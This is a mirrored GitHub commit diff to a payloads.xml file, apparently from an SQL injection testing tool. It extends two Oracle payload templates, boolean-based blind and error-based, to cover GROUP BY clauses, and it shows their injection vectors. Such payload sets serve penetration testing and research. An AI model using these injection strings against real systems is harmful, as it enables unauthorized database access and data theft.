Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit 8ff7c9a

Browse files
committed
Works on Oracle's GROUP BY too
1 parent 81e7465 commit 8ff7c9a

1 file changed

Lines changed: 4 additions & 4 deletions

File tree

xml/payloads.xml

Lines changed: 4 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -712,11 +712,11 @@ Formats:
712712
</test>
713713

714714
<test>
715-
<title>Oracle boolean-based blind - ORDER BY clause</title>
715+
<title>Oracle boolean-based blind - GROUP BY and ORDER BY clauses</title>
716716
<stype>1</stype>
717717
<level>3</level>
718718
<risk>1</risk>
719-
<clause>3</clause>
719+
<clause>2,3</clause>
720720
<where>1</where>
721721
<vector>, (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)</vector>
722722
<request>
@@ -1169,11 +1169,11 @@ Formats:
11691169
</test>
11701170

11711171
<test>
1172-
<title>Oracle error-based - ORDER BY clause</title>
1172+
<title>Oracle error-based - GROUP BY and ORDER BY clauses</title>
11731173
<stype>2</stype>
11741174
<level>3</level>
11751175
<risk>0</risk>
1176-
<clause>3</clause>
1176+
<clause>2,3</clause>
11771177
<where>1</where>
11781178
<vector>, (SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((%s),' ','[SPACE_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
11791179
<request>

0 commit comments

Comments
 (0)